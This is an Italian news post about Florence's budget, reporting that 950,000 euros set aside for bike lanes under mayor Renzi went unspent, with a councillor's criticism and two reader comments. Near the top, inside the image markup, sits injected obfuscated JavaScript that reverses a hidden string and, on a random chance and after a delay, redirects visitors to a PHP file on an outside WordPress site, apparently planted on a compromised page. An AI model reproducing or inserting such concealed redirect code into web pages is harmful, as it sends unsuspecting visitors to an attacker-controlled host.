Piste ciclabili, zero euro di investimenti nel bilancio del comune

image_pdfimage_print
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://altracitta.org/wp-content/uploads/2012/04/Renzi_bici.jpg”>
il sindaco Renzi pedala fuori pista

950mila euro stanziati per le piste ciclabili, e non si è speso un euro.
Questo sconcertante dato emerge dal bilancio del comune di Firenze, esaminato dal gruppo consiliare perUnaltracittà.

“Dopo tre anni di discussioni e dopo varie mozioni approvate in Consiglio Comunale a favore dell’uso della bicicletta e per la realizzazione di nuove piste ciclabili – dice Ornella De Zordo – non è stato fatto quasi nulla”.
Le risorse stanziate per le ciclabili per il 2011, come detto, non sono state toccate. Quelle del 2010 sono state usate per una minima parte, neanche il 2%.

“A confronto – aggiunge De Zordo, la precedente amministrazione Domenici si impegnava e spendeva meglio e di più: nel 2008 furono spesi per le piste ciclabili 154.935,68 e ulteriori 91.434,18 euro, rispetto a una disponibilità di fondi rispettivamente pari a 180.000 e a 140.00 euro”.

E conclude: “Cosa è previsto invece per le piste ciclabili nel bilancio 2012 e 2013, in vista dei mondiali di ciclismo del settembre 2013, quando Firenze si dovrà presentare con interventi ciclabili realizzati “a misura di Europa”? Non c’è da farsi grandi illusioni, visti anche i risultati degli anni passati. Innanzitutto per la “Pista in riva sinistra d’Arno dall’Argingrosso al confine comunale 1° e 2° lotto” sono previsti 400.000 euro complessivi, provenienti dal contributo Ministeriale e dai trasferimenti di RFI (in realtà 200.00 euro non sono state utilizzati nel 2011 per la stessa opera), mentre per lo stanziamento base, la “Realizzazione e manutenzione straordinaria Piste Ciclabili” sono previsti 330.000 per l’anno 2012 e complessivi 1.040.000 euro per il 2013 fra trasferimenti da RFI e mutui. Saranno spesi in tempo per i mondiali di ciclismo? Intanto “perUnaltracittà” presenterà degli emendamenti al bilancio di previsione, per incrementare il fondo che sarà disponibile già per l’anno in corso, in modo che ci sia più tempo per poter realizzare nuove piste ciclabili”.

0 Comments

  1. Giovanni

    Spiegatemi anche una cosa… In piazza San Giovanni (Duomo), zona pedonale, e nelle tante altre zone pedonali del centro le bici non possono circolare? I pedoni urlano sempre contro noi ciclisti che nn è zona per noi… i vigili sono vaghi nelle loro risposte… allora perchè nella campagna di pedonalizzazione del Sindaco si vedevano stampati nei tanti manifesti biciclette che pedalavano intorno al duomo? Che lo stil novo sia un caos dove tutti fanno un pò come c…o gli pare?

    Reply
  2. roberto

    I preventivi sono illusioni
    Esiste un documento dove si raffronta preventivo e consuntivo ? E se si dove lo trovo ?
    Grazie

    Reply

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *